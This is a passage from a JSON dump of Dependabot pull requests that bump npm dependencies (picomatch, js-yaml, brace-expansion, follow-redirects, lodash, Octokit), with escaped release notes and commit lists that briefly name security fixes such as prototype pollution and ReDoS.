href=\"https://github.com/micromatch/picomatch/commit/1798b07e9df59500b9cf567294d44d559032f4c7\"\u003e\u003ccode\u003e1798b07\u003c/code\u003e\u003c/a\u003e docs: fix \u003ccode\u003emakeRe\u003c/code\u003e example (\u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/143\"\u003e#143\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/9d76bc57a03b7f57cc4ca516c8071daf632bafd8\"\u003e\u003ccode\u003e9d76bc5\u003c/code\u003e\u003c/a\u003e chore: undocument removed options (\u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/146\"\u003e#146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/e4d718bbfb47e4f030ab2612b5b04a9297fe272d\"\u003e\u003ccode\u003ee4d718b\u003c/code\u003e\u003c/a\u003e Remove unused time-require (\u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/160\"\u003e#160\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/38dffeb16221cc8eb8981524fb6895dd2aaaba76\"\u003e\u003ccode\u003e38dffeb\u003c/code\u003e\u003c/a\u003e chore(deps): pin dependencies (\u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/158\"\u003e#158\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/micromatch/picomatch/compare/4.0.2...4.0.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `picomatch` from 2.3.1 to 2.3.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/releases\"\u003epicomatch's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.0.4\u003c/h2\u003e\n\u003cp\u003eThis is a security release fixing several security relevant issues.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\"\u003eCVE-2026-33671\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\"\u003eCVE-2026-33672\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/micromatch/picomatch/compare/4.0.3...4.0.4\"\u003ehttps://github.com/micromatch/picomatch/compare/4.0.3...4.0.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.0.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: exception when glob pattern contains \u003ccode\u003econstructor\u003c/code\u003e by \u003ca href=\"https://github.com/Jason3S\"\u003e\u003ccode\u003e@​Jason3S\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/micromatch/picomatch/pull/144\"\u003emicromatch/picomatch#144\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Jason3S\"\u003e\u003ccode\u003e@​Jason3S\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/micromatch/picomatch/pull/144\"\u003emicromatch/picomatch#144\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/micromatch/picomatch/compare/4.0.2...4.0.3\"\u003ehttps://github.com/micromatch/picomatch/compare/4.0.2...4.0.3\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/e5474fc1a4d7991870058170407dda8a42be5334\"\u003e\u003ccode\u003ee5474fc\u003c/code\u003e\u003c/a\u003e Publish 4.0.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903\"\u003e\u003ccode\u003e4516eb5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d\"\u003e\u003ccode\u003e5eceecd\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/0db7dd70651ca7c8265601c0442a996ed32e3238\"\u003e\u003ccode\u003e0db7dd7\u003c/code\u003e\u003c/a\u003e Run benchmark again against latest minimatch version (\u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/161\"\u003e#161\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/95003777eb1c60dec09495a8231fa2ba4054d76a\"\u003e\u003ccode\u003e9500377\u003c/code\u003e\u003c/a\u003e docs: clarify what brace expansion syntax is and isn't supported (\u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/134\"\u003e#134\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/2661f23eca86c8b4a2b14815b9b2b3b74bd5a171\"\u003e\u003ccode\u003e2661f23\u003c/code\u003e\u003c/a\u003e fix typo in globstars.js test name (\u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/138\"\u003e#138\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/1798b07e9df59500b9cf567294d44d559032f4c7\"\u003e\u003ccode\u003e1798b07\u003c/code\u003e\u003c/a\u003e docs: fix \u003ccode\u003emakeRe\u003c/code\u003e example (\u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/143\"\u003e#143\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/9d76bc57a03b7f57cc4ca516c8071daf632bafd8\"\u003e\u003ccode\u003e9d76bc5\u003c/code\u003e\u003c/a\u003e chore: undocument removed options (\u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/146\"\u003e#146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/e4d718bbfb47e4f030ab2612b5b04a9297fe272d\"\u003e\u003ccode\u003ee4d718b\u003c/code\u003e\u003c/a\u003e Remove unused time-require (\u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/160\"\u003e#160\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/38dffeb16221cc8eb8981524fb6895dd2aaaba76\"\u003e\u003ccode\u003e38dffeb\u003c/code\u003e\u003c/a\u003e chore(deps): pin dependencies (\u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/158\"\u003e#158\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/micromatch/picomatch/compare/4.0.2...4.0.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 3.14.1 to 3.14.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/cc482e775913e6625137572a3712d2826170e53a\"\u003e\u003ccode\u003ecc482e7\u003c/code\u003e\u003c/a\u003e 4.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/50968b862e75866ef90e626572fe0b2f97b55f9f\"\u003e\u003ccode\u003e50968b8\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/d092d866031751cb27c12d93f3e2470ad74d678b\"\u003e\u003ccode\u003ed092d86\u003c/code\u003e\u003c/a\u003e lint fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879\"\u003e\u003ccode\u003e383665f\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/0d3ca7a27b03a6c974790a30a89e456007d62976\"\u003e\u003ccode\u003e0d3ca7a\u003c/code\u003e\u003c/a\u003e README.md: HTTP =\u0026gt; HTTPS (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/49baadd52af887d2991e2c39a6639baa56d6c71b\"\u003e\u003ccode\u003e49baadd\u003c/code\u003e\u003c/a\u003e doc: 'empty' style option for !!null\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/ba3460eb9d3e4478edcbc29edabe17c2157fc9ce\"\u003e\u003ccode\u003eba3460e\u003c/code\u003e\u003c/a\u003e Fix demo link (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/4.1.0...4.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `brace-expansion` from 1.1.11 to 1.1.14\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/juliangruber/brace-expansion/releases\"\u003ebrace-expansion's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.1.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003epkg: publish on tag 1.x  c460dbd\u003c/li\u003e\n\u003cli\u003efmt  ccb8ac6\u003c/li\u003e\n\u003cli\u003eFix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)  c3c73c8\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\"\u003ehttps://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/10c05fcf3699b1a29ef5e611c011af3d3c97e6e3\"\u003e\u003ccode\u003e10c05fc\u003c/code\u003e\u003c/a\u003e 1.1.14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/1afa1b22ead12f6a7a02f25bf0f7d64c2439b007\"\u003e\u003ccode\u003e1afa1b2\u003c/code\u003e\u003c/a\u003e Add opt-in { max } mitigation to v1 legacy line (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/103\"\u003e#103\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/2fbb6a2aa0f984bb2fb5f60252ca6cba3e1368ec\"\u003e\u003ccode\u003e2fbb6a2\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;Backport fix for GHSA-7h2j-956f-4vf2 to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/101\"\u003e#101\u003c/a\u003e)\u0026quot; (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/102\"\u003e#102\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/0d7652e3093d3273151729812f9b0b79a17ecba6\"\u003e\u003ccode\u003e0d7652e\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-7h2j-956f-4vf2 to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/101\"\u003e#101\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/6c353caf23beb9644f858eb3fe38d43a68b82898\"\u003e\u003ccode\u003e6c353ca\u003c/code\u003e\u003c/a\u003e 1.1.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2\"\u003e\u003ccode\u003e7fd684f\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-f886-m6hf-6m8v (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/95\"\u003e#95\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/44f33b47c5c6a965d507421af43e86cf5971d711\"\u003e\u003ccode\u003e44f33b4\u003c/code\u003e\u003c/a\u003e 1.1.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c460dbd68e428d147b2080622d8ce126c7a08570\"\u003e\u003ccode\u003ec460dbd\u003c/code\u003e\u003c/a\u003e pkg: publish on tag 1.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/ccb8ac6d4292b7661b677fe048ba6690c877f51f\"\u003e\u003ccode\u003eccb8ac6\u003c/code\u003e\u003c/a\u003e fmt\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c3c73c8b088defc70851843be88ccc3af08e7217\"\u003e\u003ccode\u003ec3c73c8\u003c/code\u003e\u003c/a\u003e Fix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/1.1.11...v1.1.14\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `follow-redirects` from 1.15.11 to 1.16.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/0c23a223067201c368035e82954c11eb2578a33b\"\u003e\u003ccode\u003e0c23a22\u003c/code\u003e\u003c/a\u003e Release version 1.16.0 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/844c4d302ac963d29bdb5dc1754ec7df3d70d7f9\"\u003e\u003ccode\u003e844c4d3\u003c/code\u003e\u003c/a\u003e Add sensitiveHeaders option.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/5e8b8d024e2c76f804a284258e585ecb49a575be\"\u003e\u003ccode\u003e5e8b8d0\u003c/code\u003e\u003c/a\u003e ci: add Node.js 24.x to the CI matrix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/7953e2255aa0b93602eed3804f3bc5e6923a03af\"\u003e\u003ccode\u003e7953e22\u003c/code\u003e\u003c/a\u003e ci: upgrade GitHub Actions to use setup-node@v6 and checkout@v6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/86dc1f86e4b56bcd642c78384d51f10f123aea75\"\u003e\u003ccode\u003e86dc1f8\u003c/code\u003e\u003c/a\u003e Sanitizing input.\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/follow-redirects/follow-redirects/compare/v1.15.11...v1.16.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `lodash` from 4.17.23 to 4.18.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/lodash/lodash/releases\"\u003elodash's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.18.1\u003c/h2\u003e\n\u003ch2\u003eBugs\u003c/h2\u003e\n\u003cp\u003eFixes a \u003ccode\u003eReferenceError\u003c/code\u003e issue in \u003ccode\u003elodash\u003c/code\u003e \u003ccode\u003elodash-es\u003c/code\u003e \u003ccode\u003elodash-amd\u003c/code\u003e and \u003ccode\u003elodash.template\u003c/code\u003e when using the \u003ccode\u003etemplate\u003c/code\u003e and \u003ccode\u003efromPairs\u003c/code\u003e functions from the modular builds. See \u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6167#issuecomment-4165269769\"\u003elodash/lodash#6167\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eThese defects were related to how lodash distributions are built from the main branch using \u003ca href=\"https://github.com/lodash-archive/lodash-cli\"\u003ehttps://github.com/lodash-archive/lodash-cli\u003c/a\u003e. When internal dependencies change inside lodash functions, equivalent updates need to be made to a mapping in the lodash-cli. (hey, it was ahead of its time once upon a time!). We know this, but we missed it in the last release. It's the kind of thing that passes in CI, but fails bc the build is not the same thing you tested.\u003c/p\u003e\n\u003cp\u003eThere is no diff on main for this, but you can see the diffs for each of the npm packages on their respective branches:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003elodash\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-es\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-amd\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash.template\u003c/code\u003e\u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e4.18.0\u003c/h2\u003e\n\u003ch2\u003ev4.18.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.23...4.18.0\"\u003ehttps://github.com/lodash/lodash/compare/4.17.23...4.18.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.unset\u003c/code\u003e / \u003ccode\u003e_.omit\u003c/code\u003e\u003c/strong\u003e: Fixed prototype pollution via \u003ccode\u003econstructor\u003c/code\u003e/\u003ccode\u003eprototype\u003c/code\u003e path traversal (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-f23m-r3pf-42rh\"\u003eGHSA-f23m-r3pf-42rh\u003c/a\u003e, \u003ca href=\"https://github.com/lodash/lodash/commit/fe8d32eda854377349a4f922ab7655c8e5df9a0b\"\u003efe8d32e\u003c/a\u003e). Previously, array-wrapped path segments and primitive roots could bypass the existing guards, allowing deletion of properties from built-in prototypes. Now \u003ccode\u003econstructor\u003c/code\u003e and \u003ccode\u003eprototype\u003c/code\u003e are blocked unconditionally as non-terminal path keys, matching \u003ccode\u003ebaseSet\u003c/code\u003e. Calls that previously returned \u003ccode\u003etrue\u003c/code\u003e and deleted the property now return \u003ccode\u003efalse\u003c/code\u003e and leave the target untouched.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.template\u003c/code\u003e\u003c/strong\u003e: Fixed code injection via \u003ccode\u003eimports\u003c/code\u003e keys (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-r5fr-rjxr-66jc\"\u003eGHSA-...\n\n_Description has been truncated_","html_url":"https://github.com/accordproject/template-archive/pull/909","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/accordproject%2Ftemplate-archive/issues/909","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/909/packages"},{"uuid":"4373543510","node_id":"PR_kwDOSTbGDM7X2kbu","number":1,"state":"open","title":"build(deps): bump the npm_and_yarn group across 1 directory with 3 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":2,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-05-04T01:31:00.000Z","updated_at":"2026-05-04T06:07:28.477Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"build(deps): bump","group_name":"npm_and_yarn","update_count":3,"packages":[{"name":"@octokit/plugin-paginate-rest","old_version":"6.1.2","new_version":"14.0.0","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"@octokit/request","old_version":"6.2.8","new_version":"10.0.8"},{"name":"@octokit/request-error","old_version":"3.0.3","new_version":"7.1.0"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 1 update in the / directory: [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js).\n\nUpdates `@octokit/plugin-paginate-rest` from 6.1.2 to 14.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/releases\"\u003e@​octokit/plugin-paginate-rest's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev14.0.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.2.1...v14.0.0\"\u003e14.0.0\u003c/a\u003e (2025-10-31)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd immutable releases, enterprise team membership, enterprise team organization endpoints (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/413e8990ce34854cb3a7d22f8a7366ea6a1eb0d5\"\u003e413e899\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove \u003ccode\u003eGET /projects/{project_id}/columns\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eRemove \u003ccode\u003eGET /enterprises/{enterprise}/secret-scanning/alerts\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.2.0...v13.2.1\"\u003e13.2.1\u003c/a\u003e (2025-10-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/698\"\u003e#698\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/ba56fbcc7e41a9ae19b5f2c09d4b94f8e4c7d70a\"\u003eba56fbc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.2.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.1.1...v13.2.0\"\u003e13.2.0\u003c/a\u003e (2025-09-29)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003enew Projects v2 endpoints, new code scanning dismissal endpoints, many other endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/690\"\u003e#690\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/0e236cb76f82cfc073b381802e4fea03f59c213c\"\u003e0e236cb\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.1.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.1.0...v13.1.1\"\u003e13.1.1\u003c/a\u003e (2025-06-27)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ehandle url in response when using pagination with compareCommits (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/686\"\u003e#686\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8e5da25f975d2f31dda6b8b588d71f2c768a8df2\"\u003e8e5da25\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.1.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.0.1...v13.1.0\"\u003e13.1.0\u003c/a\u003e (2025-06-16)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd paginatantion support for  \u003ccode\u003ecompareCommits\u003c/code\u003e and \u003ccode\u003ecompareCommitsWithBasehead\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/678\"\u003e#678\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/6d8ea8ad68058e45883a1a7edaaf6d8a91d732bd\"\u003e6d8ea8a\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.0.0...v13.0.1\"\u003e13.0.1\u003c/a\u003e (2025-05-25)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/413e8990ce34854cb3a7d22f8a7366ea6a1eb0d5\"\u003e\u003ccode\u003e413e899\u003c/code\u003e\u003c/a\u003e feat: add immutable releases, enterprise team membership, enterprise team org...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/3d311d679e3d3ebaf073a66c5ce8a0603bf47d52\"\u003e\u003ccode\u003e3d311d6\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency \u003ccode\u003e@​types/node\u003c/code\u003e to v24 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/701\"\u003e#701\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/ba56fbcc7e41a9ae19b5f2c09d4b94f8e4c7d70a\"\u003e\u003ccode\u003eba56fbc\u003c/code\u003e\u003c/a\u003e fix(deps): update \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/698\"\u003e#698\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca 